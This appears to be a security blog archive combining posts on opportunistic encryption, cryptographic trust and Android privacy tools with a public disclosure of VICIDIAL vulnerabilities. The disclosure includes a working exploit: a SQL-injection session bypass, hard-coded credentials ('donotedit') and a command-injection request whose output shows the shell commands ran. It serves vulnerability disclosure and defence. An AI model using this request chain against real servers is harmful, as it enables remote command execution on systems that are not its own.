Opportunistic encryption has become quite a hot topic recently, and blew up in a big way thanks to an Internet Draft that was published on February 14th for what amounts to sanctioned man-in-the-middle. Privacy advocates were quickly up in arms - but it’s not that simple (see here). As pointed out by Brad Hill, this isn’t about HTTPS traffic, but HTTP traffic using unauthenticated TLS; thanks to poor wording in the document, it’s easy to miss that fact if you just skim it.
It’s routine practice for ISPs to MITM unencrypted traffic today; it’s well known that Comcast does it. This practice won’t change once we move to HTTP2, regardless of unauthenticated TLS - the only question is will users know about it.
But this isn’t about that single internet draft, it’s about what this tells us about opportunistic encryption.
We’ve seen many smart people get very upset (myself included) over a misunderstanding about how opportunistic encryption fits into the new HTTP2 paradigm. What does that tell us about how it’ll be perceived in the future?
What does opportunistic encryption buy us?
We can break attackers down into two classes:
Active - Will intercept and re-route traffic, at small or large scale.
Passive - Will watch what goes over the wire, but is unable or unwilling to interfere with it.
Opportunistic encryption prevents passive attackers from being able to collect data, they will either fail or be forced into an active role (if they are positioned and financed to do so). While many talk about increasing the cost of surveillance for groups like the NSA, I doubt that will create a substantial impact - we know that they are both active and passive today. So they are positioned for active attacks when they so desire, though there may be some reduction of monitoring lower value targets due to increased complexity / resource demands.
What opportunistic encryption doesn’t do
Unauthenticated TLS skips the most vital step in the process - it doesn’t verify that the server is actually the one you intend to talk to, meaning anyone that can control network traffic between you and the end server, can pretend to be the end server, monitoring all traffic. Which is, exactly what we have today with HTTP traffic.
So, you know your traffic is encrypted, what you don’t know is who has the keys, or how many people have seen the traffic. You’re safe from passive threats, but it provides no protection against active threats - but it’s also not intended to.
Should we pursue it?
If people weren’t involved - it eliminates a class of attacks without substantial costs, and forces passive attackers to become active. Overall, that sounds like a win, but there’s a problem: people.
Opportunistic encryption isn’t real security, it doesn’t stand up to active attackers - it provides protection against only a specific type of attack. Real TLS provides protection against both active and passive threats. If people understood this, opportunistic encryption would be fine - but people don’t understand that, that’s clear.
If people see it as a “just works” alternative to real TLS, then the harm it does greatly outweighs the value it provides. It will give a false sense of security, when in reality there is none.
Update: The SQL Injection vulnerability has been assigned CVE-2013-4467, and Command Injection assigned CVE-2013-4468.
VICIDIAL (a.k.a. Asterisk GUI client) is an open-source dialer built on top of the Asterisk PBX. It’s written in PHP, and has a significant number of security issues.
In addition to the open-source project, the company behind VICIDIAL, The Vicidial Group, also offers VICIDIAL in a hosted environment.
At this time, the current release version is still vulnerable. Vendor reports hosted users are on a fixed version. Vendor proposed to release the OSS code in mid-July, as of October 23rd, no update or advisory has been released.
After discussions with other researchers, I have made the decision that after waiting more than 140 days for a release, patches, or an advisory warning users, that the next responsible step is to disclose the issue publicly.
This is not a decision I take lightly, but I believe at this point users of this application should understand the degree of risk involved, and have details so they can take action to minimize that risk.
Tested versions: 2.7RC1, 2.7, 2.8-403a; it is likely other versions are affected.
There are three vulnerabilities that I will discuss here:
Pre-Auth SQL Injection in ./apc/SCRIPT_multirecording_AJAX.php
Hard-Coded User Credentials
Command Injection in ./agc/manager_send.php
There are pre and/or post authentication SQL injection flaws in nearly every file in the ./agc directory. The web portion is split between ./agc (which is the ‘agent’ interface) and ./vicidial (the administrative interface). My review did not include the ./vicidial directory, though a quick glance indicates that there are likely many issues there as well.
There are many other issues; from XSS to a possible DoS by allowing an attacker to write directly to a log file until the attacker has exhausted the free space on the server.
There’s also ./vicidial_mysql_errors.txt - it might be of interest as it contains query parameters.
I will not document all of the issues that I’ve found; partly because I don’t want to take the time, and also because I feel bad for the team at OSVDB - hundreds of entries for the same application wouldn’t be fun.
Pre-Auth SQL Injection
This is your typical, boring, SQL injection:
SCRIPT_multirecording_AJAX.php - Line 44
<?php...$stmt="select campaign_rec_filename from vicidial_campaigns where campaign_id='$campaign'";
The $campaign variable is unsanitized and passed directly to the query. This isn’t the best SQL Injection ever, but it demonstrates the issue.
Hard-Coded User Credentials
There are two accounts that are created when you install VICIDIAL that have hard coded passwords, that are used by the software. While these accounts have minimal permissions, they do allow an attacker to get to portions of the code not accessible without a valid user account.
Both accounts have the same password: donotedit.
In multiple locations, there are calls to passthru() that do not perform any filtering or sanitization on the input. In this case, we are looking at ./agc/manager_send.php line 429.
To exploit this, the following values must be set:
session_name=AAAAAAAAAAAA (or any other value at least 12 bytes long)
server_ip=' OR '1' = '1
The payload is passed in the extension parameter, for my testing, I used the following:
As you’ve probably noticed, the value for server_ip isn’t just a dummy value, it’s taking advantage of a SQL Injection vulnerability on line 285:
<?php...$stmt="SELECT count(*) from web_client_sessions where session_name='$session_name' and server_ip='$server_ip';";
This allows us to bypass the check for an active session, and we use the hard coded credentials to get around the need for authentication.
When you execute this, it looks like this:
GET http://192.168.10.131/agc/manager_send.php?enable_sipsak_messages=1&allow_sipsak_messages=1&protocol=sip&ACTION=OriginateVDRelogin&session_name=AAAAAAAAAAAA&server_ip=%27%20OR%20%271%27%20%3D%20%271&extension=%3Bid%3Buname%20-a%3B&user=VDCL&pass=donotedit HTTP/1.1
HTTP/1.1 200 OK
Date: Sun, 02 Jun 2013 23:22:38 GMT
Server: Apache/2.2.21 (Linux/SUSE)
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=utf-8
<!-- sending login sipsak message: LIN- -->
uid=30(wwwrun) gid=8(www) groups=8(www)
Linux linux-0y3h 3.1.10-1.23.1-pae #1 SMP Tue May 21 12:46:34 UTC 2013 (8645a72) i686 i686 i386 GNU/Linux
ERROR Exten is not valid or queryCID LIN--130602192238 is not valid, Originate command not inserted
As you can see, when you run this, the the returned text from the shell is included in the middle of the body in the server’s response.
Timeline & Vendor Response
The vendor quickly acknowledged the issues and promised quick fixes. As time has gone on, their hosted users received the security fixes, users of the open-source version remain unaware of the issue and unprotected.
6/3/2013 - Vendor notified
6/3/2013 - Vendor confirmed
6/13/2013 - Vendor states first phase of changes complete; began rolling out fixes to hosted users.
6/15/2013 - Requested release timeline.
6/15/2013 - Vendor requests disclosure delay till mid-July 2013.
7/3/2013 - Vendor advises second phase of changes complete and being pushed to hosted users.
8/26/2013 - Requested status update.
8/27/2013 - Vendor advises final phase of changes complete, hosted users update with all security changes. Expects to release OSS code in two weeks.
9/20/2013 - Requested status update.
9/25/2013 - Vendor advises of unrelated delay. Expected to complete work for next release by 9/30.
10/23/2013 - Decision made that further delays not in the public interest.
This (somewhat) hypothetical conversation is becoming more common in the face of uncertainty and wild speculation. We have seen a glimpse into the greatest adversary that cryptography has. And we’ve learned almost nothing.
We know they have attacks, but we don’t know against what. Is Diffie-Hellman broken? Is ECC backdoored? Has the RSA problem been solved? Or maybe they’ve only found a somewhat more efficient way to factor RSA keys? I’ve also heard speculation that they’ve broken RC4. They might have backdoors in OpenSSL or Microsoft’s CAPI.
We have no idea.
Here’s what we do know, in the past, uncertainty and speculation drove adoption of snake-oil solutions. Flawed, nonsensical technologies that just did more harm than good. Speculation today risks driving people from something that’s safe, to tools that leave them fully exposed.
It’s hard to give pragmatic advice in the face such uncertainty; but we must be cautious, we must not panic. I won’t accuse anyone of over-reacting, as what we have seen is startling to say the least - but there are bigger risks to consider.
For example, let’s assume for just a moment that the NSA has, in fact, influenced the ECC specification to include curves with weaknesses known to itself. What are the risks?
The NSA is able to decrypt messages at will.
A well equipped adversary (say, another state funded group) could discover the flaw, and exploit it.
Neither of those give me warm-fuzzies, but there are worse things: in the panic over “OMG - ECC is broken” people hastily switch to magic solutions that rely on obscurity and have no proven security, or to hastily implemented, poorly configured solutions that make them vulnerable to not only nation-state level adversaries, but much smaller ones as well.
If in the panic over ECC one was to move to an RSA based system with weak keys - they are likely to be far more vulnerable than they would have been, had they done nothing at all.
This of course applies to many scenarios, not just ECC - and personally, I trust ECC over RSA, at lease when using curve25519 or other non-NSA supplied curves.
There are no good answers to be found right now; all we can do is exercise caution and try to keep people from over-reacting and making their problems worse.
[N.B. I realize that meet-in-the-middle isn’t practical against AES-256 with technology as we know it, but it had to be pointed out. Also, please, please don’t use the double AES-256 / AES-512 code. Really. Just don’t.]
Even as a child I was fascinated by cryptography - and often left the local librarians with puzzled looks thanks to the books I would check out. It’s so elegantly simple, and yet massively complex. There is one very unusual property of crypto though - it’s not about math or modes, it’s about trust.
Cryptography, especially as used today, has the most wonderful dichotomy of trust; on one hand crypto, by it’s very nature, is used in situations lacking trust. On the other hand, to use crypto - you have to trust it.
But what is it?
This is where it gets interesting - let’s say you download GPGTools, what is the chain of trust?
Has anyone verified that the GPGtools binaries match the source code in the git repo? Im suspicious of any binary distro encryption software
The installer hasn’t been tampered with by your ISP, their upstream providers, GPGTools’ hosting company - all of this is before you even get to the people that publish the software! (And we know this is being done.)
The computer that built the binaries was free of malware, or other backdoors.
The source code hadn’t been modified, without the knowledge of the developers.
The developers haven’t modified the code to add backdoors or otherwise weaken it.
The compiler, and other libraries are free of backdoors or other modifications that would alter the resulting binaries.
I could keep going, there’s more - but this gives an idea of how many things you have to trust, not just for every application - but every update of every application.
You could compile everything yourself of course (if its’ open source that is) - but that only eliminates some of these issues. You still have to trust the code, you still have to trust the developers.
Well, you could audit the code. If you know what you’re doing - in a few weeks you might actually get to the point of installing it. Which of course there will be a new update by then.
Can’t we fix this?
Some of it, yes - maybe. The Tor project is working on deterministic builds, which would allow others to verify that the released binary was built from a specific revision of the source code. This is really quite impressive, and something I truly applaud them for.
But, that doesn’t lessen the trust you place in the developers and the code - is it actually secure? Are the even competent to be doing this work? Are there bugs in the PRNG or key negotiation that could render the system pointless? There’s still a level of trust required.
What about the standards?
We know that the government has sought to backdoor or weaken systems in the past - from things like the Clipper chip; enforcing illogical export restrictions, and trying to enact laws that mandate backdoors (CALEA II). Now, we know that after losing the Crypto Wars of the past, they have been clandestinely doing the same things.
The single biggest things that you have to trust are the protocols and algorithms - they are the most complicated, and only a very small number of people are qualified to audit them. If the protocol has deliberate flaws, or there is a backdoor in the algorithm - then your efforts to encrypt may be for nothing.
It’s all about trust
I’m a big fan of taking the “trust no one” position (and myself least of all), but in the world of cryptography - it’s not that easy. Every step of the way you have to trust something.
@gentmatt way to miss the point. "Trust, but verify". The time for verification has come.
Some say, “trust but verify” - and I agree, but full verification is a dream that will never come true. There aren’t enough qualified eyes, and there is far too much code involved.
With so many dependencies, so many places something malicious could be injected - it’s almost overwhelming to think about. In my eyes though, the first, and most important step, is helping people to understand the chain of trust. If you understand what you are trusting, you can ask better questions.
There is no real answer here - this is simply how it is. If you use cryptography (and you aren’t a true cryptographer), then you’re taking a leap of faith. If you didn’t compile all of the tools you use - it’s an even bigger leap.
[N.B. This article was planned before the Bullrun story broke; but in light of these recent events, I’ve updated and published this ahead of schedule.]
As it turns out, it’s quite easy to make your Android phone NSA-proof. It’s a simple method, and anyone can do it - all you need is a few ounces of thermite!
Let’s shoot for something a little more attainable - spy resistant. We can’t stop every attack, but we can reduce the attack surface a bit. Here are a few tools that I’ve been using recently to do just that.
Boxcryptor Classic - Like many people, I use DropBox for certain, low sensitivity files. But what about things that require a little more care? Boxcryptor Classic encrypts files and then stores the encrypted copy in DropBox. It’s simple, security seems sound, and the free edition is quite adequate. May not be perfect, but suits my needs nicely.
TextSecure - It’s open-source, it’s free, and it’s from Moxie - what’s not to love? It stores all of your SMS & MMS data encrypted, and can encrypt the data over the air when texting another TextSecure user.
Currently it uses the SMS/MMS service for messaging, and is Android only; both of those things are changing soon. It’ll be using the data channel and supporting iOS in the near future.
Kaiten Mail & AGP - Kaiten is a low cost ($4.99) mail client; though if you want to go cheaper, it’s open-source cousin K-9 Mail is free. They are developed by the same core team, though Kaiten seems to get the new features first, then they are ported into K-9. I like supporting OSS developers, so I happily went with the paid version. It works great with my Google Apps email account, though does take some getting used to.
Where it really comes in handy though, is when you use it with AGP, the Android Privacy Guard. It’s a simple, minimalistic OpenPGP tool that integrates nicely with Kaiten and K-9. It makes it simple to support encrypted or signed mail on your phone.
This does though require that your private key be on the device, so keep that risk in mind.
AGP is a bit dated, and hasn’t been updated since 2010. So, it’s clearly been abandoned. Thankfully though, Dominik Schürmann has forked the project and is working on a major update (new GUI, new API, etc.) that should be ready early next year.
VpnCilla - Next up is a highly configurable VPN client ($4.99). WIFI is great - except that evil part of your traffic being so simple to monitor, and with recent work on femtocell systems, even 3G/4G connections can’t be fully trusted. Having a VPN handy is a must.
You’ll also need a good VPN service; my current pick is zipline; it’s fast, cheap, and from a trusted professional (Dan Tentler).
RedPhone - Another tool from Moxie, RedPhone secures your voice communications via encrypted VoIP. Or at least so I’ve read - I never actually make voice calls on my personal phone anymore.
Others - There are various other useful things - Google Authenticator (2FA all the things, right?), ConnectBot to SSH into your server to do anything you don’t want to do from your phone, use wifitrack & Wifi Analyzer to better understand what’s in your area.
There is, of course, obvious configuration to make things a bit safer. Make sure you have a good password, or at least a long PIN set - don’t trust patterns, and don’t bother with a 4 digit PIN.
USB debugging must be turned off - otherwise there’s no point in locking your phone. Some other settings help, but not enough - one big one is Android’s full disk encryption.
Hashkill now cracks Android FDE images master password. Speed is ~135k on 6870, ~270k/s on 7970. Android FDE is weak. pic.twitter.com/mhcvEuEP48
If you only have a short numeric PIN, the FDE is little better than a wet paper bag.
It’s not all great though, there are still weaknesses - plenty in fact. Thanks to USB MUXing there is probably a debug interface - and maybe even a full shell on your phone, and you have no way of turning it off. There may be flaws in the baseband or other software that could allow an attacker to gain control.
The list goes on and on. And that’s without the fact that your phone company hands over all of your call records, or the various apps you need, but don’t have a secure replacement.
There is no such thing as an NSA proof phone - unless you literally melt it. What we can do though is make it harder to be spied on; make the attackers work for every bit of data. Give nothing away for free.